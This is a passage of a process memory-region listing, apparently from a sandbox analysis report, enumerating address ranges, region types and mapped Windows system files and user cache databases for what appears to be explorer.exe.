Region: id = 1218 start_va = 0x5280000 end_va = 0x537ffff entry_point = 0x0 region_type = private name = "private_0x0000000005280000" filename = "" Region: id = 1219 start_va = 0x5380000 end_va = 0x5382fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005380000" filename = "" Region: id = 1220 start_va = 0x5390000 end_va = 0x53d7fff entry_point = 0x0 region_type = private name = "private_0x0000000005390000" filename = "" Region: id = 1221 start_va = 0x53e0000 end_va = 0x545ffff entry_point = 0x0 region_type = private name = "private_0x00000000053e0000" filename = "" Region: id = 1222 start_va = 0x5460000 end_va = 0x54a7fff entry_point = 0x0 region_type = private name = "private_0x0000000005460000" filename = "" Region: id = 1223 start_va = 0x54b0000 end_va = 0x552ffff entry_point = 0x0 region_type = private name = "private_0x00000000054b0000" filename = "" Region: id = 1224 start_va = 0x5530000 end_va = 0x55affff entry_point = 0x0 region_type = private name = "private_0x0000000005530000" filename = "" Region: id = 1225 start_va = 0x55b0000 end_va = 0x562ffff entry_point = 0x0 region_type = private name = "private_0x00000000055b0000" filename = "" Region: id = 1226 start_va = 0x5630000 end_va = 0x56affff entry_point = 0x0 region_type = private name = "private_0x0000000005630000" filename = "" Region: id = 1227 start_va = 0x56b0000 end_va = 0x572ffff entry_point = 0x0 region_type = private name = "private_0x00000000056b0000" filename = "" Region: id = 1228 start_va = 0x5730000 end_va = 0x57affff entry_point = 0x0 region_type = private name = "private_0x0000000005730000" filename = "" Region: id = 1229 start_va = 0x57b0000 end_va = 0x582ffff entry_point = 0x0 region_type = private name = "private_0x00000000057b0000" filename = "" Region: id = 1230 start_va = 0x5830000 end_va = 0x58affff entry_point = 0x0 region_type = private name = "private_0x0000000005830000" filename = "" Region: id = 1231 start_va = 0x58b0000 end_va = 0x592ffff entry_point = 0x0 region_type = private name = "private_0x00000000058b0000" filename = "" Region: id = 1232 start_va = 0x5930000 end_va = 0x59affff entry_point = 0x0 region_type = private name = "private_0x0000000005930000" filename = "" Region: id = 1233 start_va = 0x59b0000 end_va = 0x59b1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000059b0000" filename = "" Region: id = 1234 start_va = 0x59c0000 end_va = 0x5a3ffff entry_point = 0x0 region_type = private name = "private_0x00000000059c0000" filename = "" Region: id = 1235 start_va = 0x5a40000 end_va = 0x5a47fff entry_point = 0x5a40000 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 1236 start_va = 0x5a50000 end_va = 0x5a51fff entry_point = 0x5a50000 region_type = mapped_file name = "sndvolsso.dll.mui" filename = "\\Windows\\System32\\en-US\\sndvolsso.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\sndvolsso.dll.mui") Region: id = 1237 start_va = 0x5a60000 end_va = 0x5a6dfff entry_point = 0x0 region_type = private name = "private_0x0000000005a60000" filename = "" Region: id = 1238 start_va = 0x5a70000 end_va = 0x5a72fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a70000" filename = "" Region: id = 1239 start_va = 0x5a80000 end_va = 0x5a80fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005a80000" filename = "" Region: id = 1240 start_va = 0x5b80000 end_va = 0x5b9cfff entry_point = 0x5b80000 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000037.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000037.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000037.db") Region: id = 1241 start_va = 0x5ba0000 end_va = 0x5ba0fff entry_point = 0x0 region_type = private name = "private_0x0000000005ba0000" filename = "" Region: id = 1242 start_va = 0x5bb0000 end_va = 0x5daffff entry_point = 0x0 region_type = private name = "private_0x0000000005bb0000" filename = "" Region: id = 1243 start_va = 0x5db0000 end_va = 0x5eaffff entry_point = 0x5db0000 region_type = mapped_file name = "iconcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\iconcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\iconcache_48.db") Region: id = 1244 start_va = 0x5eb0000 end_va = 0x5f2ffff entry_point = 0x0 region_type = private name = "private_0x0000000005eb0000" filename = "" Region: id = 1245 start_va = 0x5f30000 end_va = 0x5faffff entry_point = 0x0 region_type = private name = "private_0x0000000005f30000" filename = "" Region: id = 1246 start_va = 0x5fb0000 end_va = 0x5fb1fff entry_point = 0x5fb0000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1247 start_va = 0x5fc0000 end_va = 0x5fc1fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000005fc0000" filename = "" Region: id = 1248 start_va = 0x6010000 end_va = 0x6010fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006010000" filename = "" Region: id = 1249 start_va = 0x6020000 end_va = 0x6020fff entry_point = 0x0 region_type = private name = "private_0x0000000006020000" filename = "" Region: id = 1250 start_va = 0x6030000 end_va = 0x60affff entry_point = 0x0 region_type = private name = "private_0x0000000006030000" filename = "" Region: id = 1251 start_va = 0x60b0000 end_va = 0x612ffff entry_point = 0x0 region_type = private name = "private_0x00000000060b0000" filename = "" Region: id = 1252 start_va = 0x6130000 end_va = 0x6130fff entry_point = 0x0 region_type = private name = "private_0x0000000006130000" filename = "" Region: id = 1253 start_va = 0x6140000 end_va = 0x6144fff entry_point = 0x6140000 region_type = mapped_file name = "winnlsres.dll" filename = "\\Windows\\System32\\winnlsres.dll" (normalized: "c:\\windows\\system32\\winnlsres.dll") Region: id = 1254 start_va = 0x6150000 end_va = 0x615ffff entry_point = 0x6150000 region_type = mapped_file name = "winnlsres.dll.mui" filename = "\\Windows\\System32\\en-US\\winnlsres.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\winnlsres.dll.mui") Region: id = 1255 start_va = 0x6160000 end_va = 0x6162fff entry_point = 0x6160000 region_type = mapped_file name = "mswsock.dll.mui" filename = "\\Windows\\System32\\en-US\\mswsock.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\mswsock.dll.mui") Region: id = 1256 start_va = 0x6170000 end_va = 0x6170fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000006170000" filename = "" Region: id = 1257 start_va = 0x6180000 end_va = 0x6181fff entry_point = 0x6180000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1258 start_va = 0x6190000 end_va = 0x6a12fff entry_point = 0x6190000 region_type = mapped_file name = "grooveintlresource.dll" filename = "\\Program Files\\Microsoft Office\\root\\Office16\\1033\\GrooveIntlResource.dll" (normalized: "c:\\program files\\microsoft office\\root\\office16\\1033\\grooveintlresource.dll") Region: id = 1259 start_va = 0x6a20000 end_va = 0x6b1ffff entry_point = 0x6a20000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 1260 start_va = 0x6b20000 end_va = 0x6c1ffff entry_point = 0x6b20000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 1261 start_va = 0x6c20000 end_va = 0x6c9ffff entry_point = 0x0 region_type = private name = "private_0x0000000006c20000" filename = "" Region: id = 1262 start_va = 0x6ca0000 end_va = 0x6d1ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ca0000" filename = "" Region: id = 1263 start_va = 0x6d20000 end_va = 0x6d9ffff entry_point = 0x0 region_type = private name = "private_0x0000000006d20000" filename = "" Region: id = 1264 start_va = 0x6da0000 end_va = 0x6e1ffff entry_point = 0x0 region_type = private name = "private_0x0000000006da0000" filename = "" Region: id = 1265 start_va = 0x6e20000 end_va = 0x6e21fff entry_point = 0x6e20000 region_type = mapped_file name = "pnidui.dll.mui" filename = "\\Windows\\System32\\en-US\\pnidui.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\pnidui.dll.mui") Region: id = 1266 start_va = 0x6e30000 end_va = 0x6e31fff entry_point = 0x6e30000 region_type = mapped_file name = "thumbcache_idx.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_idx.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_idx.db") Region: id = 1267 start_va = 0x6e40000 end_va = 0x6ebffff entry_point = 0x0 region_type = private name = "private_0x0000000006e40000" filename = "" Region: id = 1268 start_va = 0x6ec0000 end_va = 0x6f3ffff entry_point = 0x0 region_type = private name = "private_0x0000000006ec0000" filename = "" Region: id = 1269 start_va = 0x6f40000 end_va = 0x6fbffff entry_point = 0x0 region_type = private name = "private_0x0000000006f40000" filename = "" Region: id = 1270 start_va = 0x6fc0000 end_va = 0x703ffff entry_point = 0x0 region_type = private name = "private_0x0000000006fc0000" filename = "" Region: id = 1271 start_va = 0x7040000 end_va = 0x70bffff entry_point = 0x0 region_type = private name = "private_0x0000000007040000" filename = "" Region: id = 1272 start_va = 0x70c0000 end_va = 0x713ffff entry_point = 0x0 region_type = private name = "private_0x00000000070c0000" filename = "" Region: id = 1273 start_va = 0x7140000 end_va = 0x71bffff entry_point = 0x0 region_type = private name = "private_0x0000000007140000" filename = "" Region: id = 1274 start_va = 0x71c0000 end_va = 0x723ffff entry_point = 0x0 region_type = private name = "private_0x00000000071c0000" filename = "" Region: id = 1275 start_va = 0x7240000 end_va = 0x72bffff entry_point = 0x0 region_type = private name = "private_0x0000000007240000" filename = "" Region: id = 1276 start_va = 0x72c0000 end_va = 0x733ffff entry_point = 0x0 region_type = private name = "private_0x00000000072c0000" filename = "" Region: id = 1277 start_va = 0x7340000 end_va = 0x7387fff entry_point = 0x0 region_type = private name = "private_0x0000000007340000" filename = "" Region: id = 1278 start_va = 0x7390000 end_va = 0x740ffff entry_point = 0x0 region_type = private name = "private_0x0000000007390000" filename = "" Region: id = 1279 start_va = 0x7410000 end_va = 0x748ffff entry_point = 0x0 region_type = private name = "private_0x0000000007410000" filename = "" Region: id = 1280 start_va = 0x7e90000 end_va = 0x7f0ffff entry_point = 0x0 region_type = private name = "private_0x0000000007e90000" filename = "" Region: id = 1281 start_va = 0x7f10000 end_va = 0x7f8ffff entry_point = 0x0 region_type = private name = "private_0x0000000007f10000" filename = "" Region: id = 1282 start_va = 0x7fd0000 end_va = 0x7fd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007fd0000" filename = "" Region: id = 1283 start_va = 0x7fe0000 end_va = 0x7fe3fff entry_point = 0x7fe0000 region_type = mapped_file name = "bthprops.cpl.mui" filename = "\\Windows\\System32\\en-US\\bthprops.cpl.mui" (normalized: "c:\\windows\\system32\\en-us\\bthprops.cpl.mui") Region: id = 1284 start_va = 0x7ff0000 end_va = 0x7ff2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000007ff0000" filename = "" Region: id = 1285 start_va = 0x8000000 end_va = 0x8048fff entry_point = 0x0 region_type = private name = "private_0x0000000008000000" filename = "" Region: id = 1286 start_va = 0x8050000 end_va = 0xa3d1fff entry_point = 0x8050000 region_type = mapped_file name = "appdb.dat" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Notifications\\appdb.dat" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\notifications\\appdb.dat") Region: id = 1287 start_va = 0xa3e0000 end_va = 0xcff2fff entry_point = 0xa3e0000 region_type = mapped_file name = "imageres.dll" filename = "\\Windows\\System32\\imageres.dll" (normalized: "c:\\windows\\system32\\imageres.dll") Region: id = 1288 start_va = 0xd000000 end_va = 0xd07ffff entry_point = 0x0 region_type = private name = "private_0x000000000d000000" filename = "" Region: id = 1289 start_va = 0xd080000 end_va = 0xd0fffff entry_point = 0x0 region_type = private name = "private_0x000000000d080000" filename = "" Region: id = 1290 start_va = 0xd180000 end_va = 0xd57ffff entry_point = 0x0 region_type = private name = "private_0x000000000d180000" filename = "" Region: id = 1291 start_va = 0xd580000 end_va = 0xd5fffff entry_point = 0x0 region_type = private name = "private_0x000000000d580000" filename = "" Region: id = 1292 start_va = 0xda80000 end_va = 0xdb7ffff entry_point = 0xda80000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 1293 start_va = 0xdb80000 end_va = 0xdc7ffff entry_point = 0x0 region_type = private name = "private_0x000000000db80000" filename = "" Region: id = 1294 start_va = 0xdc80000 end_va = 0xdcfffff entry_point = 0x0 region_type = private name = "private_0x000000000dc80000" filename = "" Region: id = 1295 start_va = 0xdd00000 end_va = 0xdd02fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000dd00000" filename = "" Region: id = 1296 start_va = 0xdd10000 end_va = 0xdd12fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000dd10000" filename = "" Region: id = 1297 start_va = 0xdd20000 end_va = 0xdd9ffff entry_point = 0x0 region_type = private name = "private_0x000000000dd20000" filename = "" Region: id = 1298 start_va = 0xdde0000 end_va = 0xdde2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000dde0000" filename = "" Region: id = 1299 start_va = 0xddf0000 end_va = 0xddf2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000000ddf0000" filename = "" Region: id = 1300 start_va = 0xde00000 end_va = 0xde7ffff entry_point = 0x0 region_type = private name = "private_0x000000000de00000" filename = "" Region: id = 1301 start_va = 0xde80000 end_va = 0xdefffff entry_point = 0x0 region_type = private name = "private_0x000000000de80000" filename = "" Region: id = 1302 start_va = 0xdf70000 end_va = 0xe06ffff entry_point = 0xdf70000 region_type = mapped_file name = "thumbcache_48.db" filename = "\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\Windows\\Explorer\\thumbcache_48.db" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\windows\\explorer\\thumbcache_48.db") Region: id = 1303 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1304 start_va = 0x7df5ffd20000 end_va = 0x7ff5ffd1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffd20000" filename = "" Region: id = 1305 start_va = 0x7ff62a08c000 end_va = 0x7ff62a08dfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a08c000" filename = "" Region: id = 1306 start_va = 0x7ff62a08e000 end_va = 0x7ff62a08ffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a08e000" filename = "" Region: id = 1307 start_va = 0x7ff62a090000 end_va = 0x7ff62a091fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a090000" filename = "" Region: id = 1308 start_va = 0x7ff62a092000 end_va = 0x7ff62a093fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a092000" filename = "" Region: id = 1309 start_va = 0x7ff62a094000 end_va = 0x7ff62a095fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a094000" filename = "" Region: id = 1310 start_va = 0x7ff62a098000 end_va = 0x7ff62a099fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a098000" filename = "" Region: id = 1311 start_va = 0x7ff62a09a000 end_va = 0x7ff62a09bfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a09a000" filename = "" Region: id = 1312 start_va = 0x7ff62a09c000 end_va = 0x7ff62a09dfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a09c000" filename = "" Region: id = 1313 start_va = 0x7ff62a09e000 end_va = 0x7ff62a09ffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a09e000" filename = "" Region: id = 1314 start_va = 0x7ff62a0a0000 end_va = 0x7ff62a0a1fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0a0000" filename = "" Region: id = 1315 start_va = 0x7ff62a0a2000 end_va = 0x7ff62a0a3fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0a2000" filename = "" Region: id = 1316 start_va = 0x7ff62a0a4000 end_va = 0x7ff62a0a5fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0a4000" filename = "" Region: id = 1317 start_va = 0x7ff62a0a6000 end_va = 0x7ff62a0a7fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0a6000" filename = "" Region: id = 1318 start_va = 0x7ff62a0a8000 end_va = 0x7ff62a0a9fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0a8000" filename = "" Region: id = 1319 start_va = 0x7ff62a0aa000 end_va = 0x7ff62a0abfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0aa000" filename = "" Region: id = 1320 start_va = 0x7ff62a0ac000 end_va = 0x7ff62a0adfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ac000" filename = "" Region: id = 1321 start_va = 0x7ff62a0ae000 end_va = 0x7ff62a0affff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ae000" filename = "" Region: id = 1322 start_va = 0x7ff62a0b0000 end_va = 0x7ff62a0b1fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0b0000" filename = "" Region: id = 1323 start_va = 0x7ff62a0b2000 end_va = 0x7ff62a0b3fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0b2000" filename = "" Region: id = 1324 start_va = 0x7ff62a0b4000 end_va = 0x7ff62a0b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0b4000" filename = "" Region: id = 1325 start_va = 0x7ff62a0b6000 end_va = 0x7ff62a0b7fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0b6000" filename = "" Region: id = 1326 start_va = 0x7ff62a0b8000 end_va = 0x7ff62a0b9fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0b8000" filename = "" Region: id = 1327 start_va = 0x7ff62a0ba000 end_va = 0x7ff62a0bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ba000" filename = "" Region: id = 1328 start_va = 0x7ff62a0bc000 end_va = 0x7ff62a0bdfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0bc000" filename = "" Region: id = 1329 start_va = 0x7ff62a0be000 end_va = 0x7ff62a0bffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0be000" filename = "" Region: id = 1330 start_va = 0x7ff62a0c0000 end_va = 0x7ff62a0c1fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0c0000" filename = "" Region: id = 1331 start_va = 0x7ff62a0c2000 end_va = 0x7ff62a0c3fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0c2000" filename = "" Region: id = 1332 start_va = 0x7ff62a0c4000 end_va = 0x7ff62a0c5fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0c4000" filename = "" Region: id = 1333 start_va = 0x7ff62a0c6000 end_va = 0x7ff62a0c7fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0c6000" filename = "" Region: id = 1334 start_va = 0x7ff62a0c8000 end_va = 0x7ff62a0c9fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0c8000" filename = "" Region: id = 1335 start_va = 0x7ff62a0ca000 end_va = 0x7ff62a0cbfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ca000" filename = "" Region: id = 1336 start_va = 0x7ff62a0cc000 end_va = 0x7ff62a0cdfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0cc000" filename = "" Region: id = 1337 start_va = 0x7ff62a0ce000 end_va = 0x7ff62a0cffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ce000" filename = "" Region: id = 1338 start_va = 0x7ff62a0d0000 end_va = 0x7ff62a0d1fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0d0000" filename = "" Region: id = 1339 start_va = 0x7ff62a0d2000 end_va = 0x7ff62a0d3fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0d2000" filename = "" Region: id = 1340 start_va = 0x7ff62a0d4000 end_va = 0x7ff62a0d5fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0d4000" filename = "" Region: id = 1341 start_va = 0x7ff62a0d6000 end_va = 0x7ff62a0d7fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0d6000" filename = "" Region: id = 1342 start_va = 0x7ff62a0d8000 end_va = 0x7ff62a0d9fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0d8000" filename = "" Region: id = 1343 start_va = 0x7ff62a0da000 end_va = 0x7ff62a0dbfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0da000" filename = "" Region: id = 1344 start_va = 0x7ff62a0de000 end_va = 0x7ff62a0dffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0de000" filename = "" Region: id = 1345 start_va = 0x7ff62a0e0000 end_va = 0x7ff62a0e1fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0e0000" filename = "" Region: id = 1346 start_va = 0x7ff62a0e2000 end_va = 0x7ff62a0e3fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0e2000" filename = "" Region: id = 1347 start_va = 0x7ff62a0e4000 end_va = 0x7ff62a0e5fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0e4000" filename = "" Region: id = 1348 start_va = 0x7ff62a0e6000 end_va = 0x7ff62a0e7fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0e6000" filename = "" Region: id = 1349 start_va = 0x7ff62a0e8000 end_va = 0x7ff62a0e9fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0e8000" filename = "" Region: id = 1350 start_va = 0x7ff62a0ea000 end_va = 0x7ff62a0ebfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ea000" filename = "" Region: id = 1351 start_va = 0x7ff62a0ec000 end_va = 0x7ff62a0edfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ec000" filename = "" Region: id = 1352 start_va = 0x7ff62a0ee000 end_va = 0x7ff62a0effff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0ee000" filename = "" Region: id = 1353 start_va = 0x7ff62a0f0000 end_va = 0x7ff62a0f1fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0f0000" filename = "" Region: id = 1354 start_va = 0x7ff62a0f2000 end_va = 0x7ff62a0f3fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0f2000" filename = "" Region: id = 1355 start_va = 0x7ff62a0f4000 end_va = 0x7ff62a0f5fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0f4000" filename = "" Region: id = 1356 start_va = 0x7ff62a0f6000 end_va = 0x7ff62a0f7fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0f6000" filename = "" Region: id = 1357 start_va = 0x7ff62a0f8000 end_va = 0x7ff62a0f9fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0f8000" filename = "" Region: id = 1358 start_va = 0x7ff62a0fa000 end_va = 0x7ff62a0fbfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0fa000" filename = "" Region: id = 1359 start_va = 0x7ff62a0fc000 end_va = 0x7ff62a0fdfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0fc000" filename = "" Region: id = 1360 start_va = 0x7ff62a0fe000 end_va = 0x7ff62a0fffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a0fe000" filename = "" Region: id = 1361 start_va = 0x7ff62a100000 end_va = 0x7ff62a1fffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff62a100000" filename = "" Region: id = 1362 start_va = 0x7ff62a200000 end_va = 0x7ff62a222fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff62a200000" filename = "" Region: id = 1363 start_va = 0x7ff62a223000 end_va = 0x7ff62a224fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a223000" filename = "" Region: id = 1364 start_va = 0x7ff62a225000 end_va = 0x7ff62a226fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a225000" filename = "" Region: id = 1365 start_va = 0x7ff62a227000 end_va = 0x7ff62a228fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a227000" filename = "" Region: id = 1366 start_va = 0x7ff62a229000 end_va = 0x7ff62a22afff entry_point = 0x0 region_type = private name = "private_0x00007ff62a229000" filename = "" Region: id = 1367 start_va = 0x7ff62a22b000 end_va = 0x7ff62a22bfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a22b000" filename = "" Region: id = 1368 start_va = 0x7ff62a22c000 end_va = 0x7ff62a22dfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a22c000" filename = "" Region: id = 1369 start_va = 0x7ff62a22e000 end_va = 0x7ff62a22ffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a22e000" filename = "" Region: id = 1370 start_va = 0x7ff62aec0000 end_va = 0x7ff62b30dfff entry_point = 0x7ff62aec0000 region_type = mapped_file name = "explorer.exe" filename = "\\Windows\\explorer.exe" (normalized: "c:\\windows\\explorer.exe") Region: id = 1371 start_va = 0x7ff960c20000 end_va = 0x7ff960f65fff entry_point = 0x7ff960c20000 region_type = mapped_file name = "synccenter.dll" filename = "\\Windows\\System32\\SyncCenter.dll" (normalized: "c:\\windows\\system32\\synccenter.dll") Region: id = 1372 start_va = 0x7ff9610c0000 end_va = 0x7ff96127efff entry_point = 0x7ff9610c0000 region_type = mapped_file name = "pnidui.dll" filename = "\\Windows\\System32\\pnidui.dll" (normalized: "c:\\windows\\system32\\pnidui.dll") Region: id = 1373 start_va = 0x7ff961280000 end_va = 0x7ff9614c1fff entry_point = 0x7ff961280000 region_type = mapped_file name = "authui.dll" filename = "\\Windows\\System32\\authui.dll" (normalized: "c:\\windows\\system32\\authui.dll") Region: id = 1374 start_va = 0x7ff9614d0000 end_va = 0x7ff961554fff entry_point = 0x7ff9614d0000 region_type = mapped_file name = "audioses.dll" filename = "\\Windows\\System32\\AudioSes.dll" (normalized: "c:\\windows\\system32\\audioses.dll") Region: id = 1375 start_va = 0x7ff961560000 end_va = 0x7ff96156ffff entry_point = 0x7ff961560000 region_type = mapped_file name = "atlthunk.dll" filename = "\\Windows\\System32\\atlthunk.dll" (normalized: "c:\\windows\\system32\\atlthunk.dll") Region: id = 1376 start_va = 0x7ff961570000 end_va = 0x7ff9615bffff entry_point = 0x7ff961570000 region_type = mapped_file name = "actioncenter.dll" filename = "\\Windows\\System32\\ActionCenter.dll" (normalized: "c:\\windows\\system32\\actioncenter.dll") Region: id = 1377 start_va = 0x7ff9615c0000 end_va = 0x7ff9615d6fff entry_point = 0x7ff9615c0000 region_type = mapped_file name = "syncreg.dll" filename = "\\Windows\\System32\\Syncreg.dll" (normalized: "c:\\windows\\system32\\syncreg.dll") Region: id = 1378 start_va = 0x7ff9615e0000 end_va = 0x7ff961620fff entry_point = 0x7ff9615e0000 region_type = mapped_file name = "shdocvw.dll" filename = "\\Windows\\System32\\shdocvw.dll" (normalized: "c:\\windows\\system32\\shdocvw.dll") Region: id = 1379 start_va = 0x7ff961630000 end_va = 0x7ff9616a8fff entry_point = 0x7ff961630000 region_type = mapped_file name = "dxp.dll" filename = "\\Windows\\System32\\DXP.dll" (normalized: "c:\\windows\\system32\\dxp.dll") Region: id = 1380 start_va = 0x7ff9616b0000 end_va = 0x7ff9616b9fff entry_point = 0x7ff9616b0000 region_type = mapped_file name = "msiltcfg.dll" filename = "\\Windows\\System32\\msiltcfg.dll" (normalized: "c:\\windows\\system32\\msiltcfg.dll") Region: id = 1381 start_va = 0x7ff9616c0000 end_va = 0x7ff961743fff entry_point = 0x7ff9616c0000 region_type = mapped_file name = "winspool.drv" filename = "\\Windows\\System32\\winspool.drv" (normalized: "c:\\windows\\system32\\winspool.drv") Region: id = 1382 start_va = 0x7ff961750000 end_va = 0x7ff9617cbfff entry_point = 0x7ff961750000 region_type = mapped_file name = "prnfldr.dll" filename = "\\Windows\\System32\\prnfldr.dll" (normalized: "c:\\windows\\system32\\prnfldr.dll") Region: id = 1383 start_va = 0x7ff9617d0000 end_va = 0x7ff96190afff entry_point = 0x7ff9617d0000 region_type = mapped_file name = "windows.ui.shell.dll" filename = "\\Windows\\System32\\Windows.UI.Shell.dll" (normalized: "c:\\windows\\system32\\windows.ui.shell.dll") Region: id = 1384 start_va = 0x7ff961910000 end_va = 0x7ff96195efff entry_point = 0x7ff961910000 region_type = mapped_file name = "inputswitch.dll" filename = "\\Windows\\System32\\InputSwitch.dll" (normalized: "c:\\windows\\system32\\inputswitch.dll") Region: id = 1385 start_va = 0x7ff961960000 end_va = 0x7ff961bfffff entry_point 